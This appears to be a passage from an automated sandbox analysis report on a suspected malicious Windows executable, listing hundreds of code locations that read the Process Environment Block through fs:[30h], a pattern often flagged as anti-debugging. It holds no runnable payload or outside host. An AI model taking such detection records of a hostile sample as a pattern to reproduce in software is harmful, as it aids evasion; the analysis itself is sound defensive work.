Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h] 4_2_0148A2C3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h] 4_2_0148A2C3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014902E1 mov eax, dword ptr fs:[00000030h] 4_2_014902E1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014902E1 mov eax, dword ptr fs:[00000030h] 4_2_014902E1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014902E1 mov eax, dword ptr fs:[00000030h] 4_2_014902E1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE284 mov eax, dword ptr fs:[00000030h] 4_2_014BE284
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE284 mov eax, dword ptr fs:[00000030h] 4_2_014BE284
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01500283 mov eax, dword ptr fs:[00000030h] 4_2_01500283
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01500283 mov eax, dword ptr fs:[00000030h] 4_2_01500283
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01500283 mov eax, dword ptr fs:[00000030h] 4_2_01500283
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014902A0 mov eax, dword ptr fs:[00000030h] 4_2_014902A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014902A0 mov eax, dword ptr fs:[00000030h] 4_2_014902A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h] 4_2_015162A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015162A0 mov ecx, dword ptr fs:[00000030h] 4_2_015162A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h] 4_2_015162A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h] 4_2_015162A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h] 4_2_015162A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h] 4_2_015162A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01488550 mov eax, dword ptr fs:[00000030h] 4_2_01488550
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01488550 mov eax, dword ptr fs:[00000030h] 4_2_01488550
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B656A mov eax, dword ptr fs:[00000030h] 4_2_014B656A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B656A mov eax, dword ptr fs:[00000030h] 4_2_014B656A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B656A mov eax, dword ptr fs:[00000030h] 4_2_014B656A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01516500 mov eax, dword ptr fs:[00000030h] 4_2_01516500
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554500 mov eax, dword ptr fs:[00000030h] 4_2_01554500
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554500 mov eax, dword ptr fs:[00000030h] 4_2_01554500
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554500 mov eax, dword ptr fs:[00000030h] 4_2_01554500
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554500 mov eax, dword ptr fs:[00000030h] 4_2_01554500
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554500 mov eax, dword ptr fs:[00000030h] 4_2_01554500
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554500 mov eax, dword ptr fs:[00000030h] 4_2_01554500
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554500 mov eax, dword ptr fs:[00000030h] 4_2_01554500
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h] 4_2_014AE53E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h] 4_2_014AE53E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h] 4_2_014AE53E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h] 4_2_014AE53E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h] 4_2_014AE53E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490535 mov eax, dword ptr fs:[00000030h] 4_2_01490535
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490535 mov eax, dword ptr fs:[00000030h] 4_2_01490535
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490535 mov eax, dword ptr fs:[00000030h] 4_2_01490535
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490535 mov eax, dword ptr fs:[00000030h] 4_2_01490535
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490535 mov eax, dword ptr fs:[00000030h] 4_2_01490535
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490535 mov eax, dword ptr fs:[00000030h] 4_2_01490535
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE5CF mov eax, dword ptr fs:[00000030h] 4_2_014BE5CF
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE5CF mov eax, dword ptr fs:[00000030h] 4_2_014BE5CF
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014865D0 mov eax, dword ptr fs:[00000030h] 4_2_014865D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA5D0 mov eax, dword ptr fs:[00000030h] 4_2_014BA5D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA5D0 mov eax, dword ptr fs:[00000030h] 4_2_014BA5D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC5ED mov eax, dword ptr fs:[00000030h] 4_2_014BC5ED
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC5ED mov eax, dword ptr fs:[00000030h] 4_2_014BC5ED
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014825E0 mov eax, dword ptr fs:[00000030h] 4_2_014825E0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_014AE5E7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_014AE5E7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_014AE5E7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_014AE5E7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_014AE5E7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_014AE5E7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_014AE5E7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_014AE5E7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B4588 mov eax, dword ptr fs:[00000030h] 4_2_014B4588
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01482582 mov eax, dword ptr fs:[00000030h] 4_2_01482582
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01482582 mov ecx, dword ptr fs:[00000030h] 4_2_01482582
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE59C mov eax, dword ptr fs:[00000030h] 4_2_014BE59C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015005A7 mov eax, dword ptr fs:[00000030h] 4_2_015005A7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015005A7 mov eax, dword ptr fs:[00000030h] 4_2_015005A7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015005A7 mov eax, dword ptr fs:[00000030h] 4_2_015005A7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A45B1 mov eax, dword ptr fs:[00000030h] 4_2_014A45B1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A45B1 mov eax, dword ptr fs:[00000030h] 4_2_014A45B1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153A456 mov eax, dword ptr fs:[00000030h] 4_2_0153A456
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h] 4_2_014BE443
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h] 4_2_014BE443
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h] 4_2_014BE443
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h] 4_2_014BE443
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h] 4_2_014BE443
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h] 4_2_014BE443
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h] 4_2_014BE443
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h] 4_2_014BE443
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A245A mov eax, dword ptr fs:[00000030h] 4_2_014A245A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147645D mov eax, dword ptr fs:[00000030h] 4_2_0147645D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150C460 mov ecx, dword ptr fs:[00000030h] 4_2_0150C460
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AA470 mov eax, dword ptr fs:[00000030h] 4_2_014AA470
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AA470 mov eax, dword ptr fs:[00000030h] 4_2_014AA470
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AA470 mov eax, dword ptr fs:[00000030h] 4_2_014AA470
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B8402 mov eax, dword ptr fs:[00000030h] 4_2_014B8402
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B8402 mov eax, dword ptr fs:[00000030h] 4_2_014B8402
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B8402 mov eax, dword ptr fs:[00000030h] 4_2_014B8402
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147C427 mov eax, dword ptr fs:[00000030h] 4_2_0147C427
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147E420 mov eax, dword ptr fs:[00000030h] 4_2_0147E420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147E420 mov eax, dword ptr fs:[00000030h] 4_2_0147E420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147E420 mov eax, dword ptr fs:[00000030h] 4_2_0147E420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01506420 mov eax, dword ptr fs:[00000030h] 4_2_01506420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01506420 mov eax, dword ptr fs:[00000030h] 4_2_01506420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01506420 mov eax, dword ptr fs:[00000030h] 4_2_01506420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01506420 mov eax, dword ptr fs:[00000030h] 4_2_01506420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01506420 mov eax, dword ptr fs:[00000030h] 4_2_01506420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01506420 mov eax, dword ptr fs:[00000030h] 4_2_01506420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01506420 mov eax, dword ptr fs:[00000030h] 4_2_01506420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA430 mov eax, dword ptr fs:[00000030h] 4_2_014BA430
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014804E5 mov ecx, dword ptr fs:[00000030h] 4_2_014804E5
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153A49A mov eax, dword ptr fs:[00000030h] 4_2_0153A49A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150A4B0 mov eax, dword ptr fs:[00000030h] 4_2_0150A4B0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014864AB mov eax, dword ptr fs:[00000030h] 4_2_014864AB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B44B0 mov ecx, dword ptr fs:[00000030h] 4_2_014B44B0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01504755 mov eax, dword ptr fs:[00000030h] 4_2_01504755
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B674D mov esi, dword ptr fs:[00000030h] 4_2_014B674D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B674D mov eax, dword ptr fs:[00000030h] 4_2_014B674D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B674D mov eax, dword ptr fs:[00000030h] 4_2_014B674D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150E75D mov eax, dword ptr fs:[00000030h] 4_2_0150E75D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480750 mov eax, dword ptr fs:[00000030h] 4_2_01480750
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2750 mov eax, dword ptr fs:[00000030h] 4_2_014C2750
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2750 mov eax, dword ptr fs:[00000030h] 4_2_014C2750
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01488770 mov eax, dword ptr fs:[00000030h] 4_2_01488770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC700 mov eax, dword ptr fs:[00000030h] 4_2_014BC700
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480710 mov eax, dword ptr fs:[00000030h] 4_2_01480710
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B0710 mov eax, dword ptr fs:[00000030h] 4_2_014B0710
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC720 mov eax, dword ptr fs:[00000030h] 4_2_014BC720
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC720 mov eax, dword ptr fs:[00000030h] 4_2_014BC720
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B273C mov eax, dword ptr fs:[00000030h] 4_2_014B273C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B273C mov ecx, dword ptr fs:[00000030h] 4_2_014B273C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B273C mov eax, dword ptr fs:[00000030h] 4_2_014B273C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FC730 mov eax, dword ptr fs:[00000030h] 4_2_014FC730
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148C7C0 mov eax, dword ptr fs:[00000030h] 4_2_0148C7C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015007C3 mov eax, dword ptr fs:[00000030h] 4_2_015007C3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A27ED mov eax, dword ptr fs:[00000030h] 4_2_014A27ED
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A27ED mov eax, dword ptr fs:[00000030h] 4_2_014A27ED
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A27ED mov eax, dword ptr fs:[00000030h] 4_2_014A27ED
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150E7E1 mov eax, dword ptr fs:[00000030h] 4_2_0150E7E1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014847FB mov eax, dword ptr fs:[00000030h] 4_2_014847FB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014847FB mov eax, dword ptr fs:[00000030h] 4_2_014847FB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152678E mov eax, dword ptr fs:[00000030h] 4_2_0152678E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014807AF mov eax, dword ptr fs:[00000030h] 4_2_014807AF
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015347A0 mov eax, dword ptr fs:[00000030h] 4_2_015347A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149C640 mov eax, dword ptr fs:[00000030h] 4_2_0149C640
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA660 mov eax, dword ptr fs:[00000030h] 4_2_014BA660
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA660 mov eax, dword ptr fs:[00000030h] 4_2_014BA660
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154866E mov eax, dword ptr fs:[00000030h] 4_2_0154866E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154866E mov eax, dword ptr fs:[00000030h] 4_2_0154866E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B2674 mov eax, dword ptr fs:[00000030h] 4_2_014B2674
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149260B mov eax, dword ptr fs:[00000030h] 4_2_0149260B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149260B mov eax, dword ptr fs:[00000030h] 4_2_0149260B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149260B mov eax, dword ptr fs:[00000030h] 4_2_0149260B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149260B mov eax, dword ptr fs:[00000030h] 4_2_0149260B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149260B mov eax, dword ptr fs:[00000030h] 4_2_0149260B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149260B mov eax, dword ptr fs:[00000030h] 4_2_0149260B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149260B mov eax, dword ptr fs:[00000030h] 4_2_0149260B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE609 mov eax, dword ptr fs:[00000030h] 4_2_014FE609
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2619 mov eax, dword ptr fs:[00000030h] 4_2_014C2619
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148262C mov eax, dword ptr fs:[00000030h] 4_2_0148262C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B6620 mov eax, dword ptr fs:[00000030h] 4_2_014B6620
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B8620 mov eax, dword ptr fs:[00000030h] 4_2_014B8620
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149E627 mov eax, dword ptr fs:[00000030h] 4_2_0149E627
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA6C7 mov ebx, dword ptr fs:[00000030h] 4_2_014BA6C7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA6C7 mov eax, dword ptr fs:[00000030h] 4_2_014BA6C7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015006F1 mov eax, dword ptr fs:[00000030h] 4_2_015006F1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015006F1 mov eax, dword ptr fs:[00000030h] 4_2_015006F1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE6F2 mov eax, dword ptr fs:[00000030h] 4_2_014FE6F2
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE6F2 mov eax, dword ptr fs:[00000030h] 4_2_014FE6F2
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE6F2 mov eax, dword ptr fs:[00000030h] 4_2_014FE6F2
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE6F2 mov eax, dword ptr fs:[00000030h] 4_2_014FE6F2
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01484690 mov eax, dword ptr fs:[00000030h] 4_2_01484690
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01484690 mov eax, dword ptr fs:[00000030h] 4_2_01484690
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC6A6 mov eax, dword ptr fs:[00000030h] 4_2_014BC6A6
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B66B0 mov eax, dword ptr fs:[00000030h] 4_2_014B66B0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554940 mov eax, dword ptr fs:[00000030h] 4_2_01554940
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01500946 mov eax, dword ptr fs:[00000030h] 4_2_01500946
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C096E mov eax, dword ptr fs:[00000030h] 4_2_014C096E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C096E mov edx, dword ptr fs:[00000030h] 4_2_014C096E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C096E mov eax, dword ptr fs:[00000030h] 4_2_014C096E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A6962 mov eax, dword ptr fs:[00000030h] 4_2_014A6962
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A6962 mov eax, dword ptr fs:[00000030h] 4_2_014A6962
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A6962 mov eax, dword ptr fs:[00000030h] 4_2_014A6962
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01524978 mov eax, dword ptr fs:[00000030h] 4_2_01524978
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01524978 mov eax, dword ptr fs:[00000030h] 4_2_01524978
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150C97C mov eax, dword ptr fs:[00000030h] 4_2_0150C97C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150C912 mov eax, dword ptr fs:[00000030h] 4_2_0150C912
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE908 mov eax, dword ptr fs:[00000030h] 4_2_014FE908
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE908 mov eax, dword ptr fs:[00000030h] 4_2_014FE908
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01478918 mov eax, dword ptr fs:[00000030h] 4_2_01478918
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01478918 mov eax, dword ptr fs:[00000030h] 4_2_01478918
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150892A mov eax, dword ptr fs:[00000030h] 4_2_0150892A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0151892B mov eax, dword ptr fs:[00000030h] 4_2_0151892B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154A9D3 mov eax, dword ptr fs:[00000030h] 4_2_0154A9D3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015169C0 mov eax, dword ptr fs:[00000030h] 4_2_015169C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A9D0 mov eax, dword ptr fs:[00000030h] 4_2_0148A9D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A9D0 mov eax, dword ptr fs:[00000030h] 4_2_0148A9D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A9D0 mov eax, dword ptr fs:[00000030h] 4_2_0148A9D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A9D0 mov eax, dword ptr fs:[00000030h] 4_2_0148A9D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A9D0 mov eax, dword ptr fs:[00000030h] 4_2_0148A9D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A9D0 mov eax, dword ptr fs:[00000030h] 4_2_0148A9D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B49D0 mov eax, dword ptr fs:[00000030h] 4_2_014B49D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150E9E0 mov eax, dword ptr fs:[00000030h] 4_2_0150E9E0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B29F9 mov eax, dword ptr fs:[00000030h] 4_2_014B29F9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B29F9 mov eax, dword ptr fs:[00000030h] 4_2_014B29F9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015089B3 mov esi, dword ptr fs:[00000030h] 4_2_015089B3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015089B3 mov eax, dword ptr fs:[00000030h] 4_2_015089B3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015089B3 mov eax, dword ptr fs:[00000030h] 4_2_015089B3
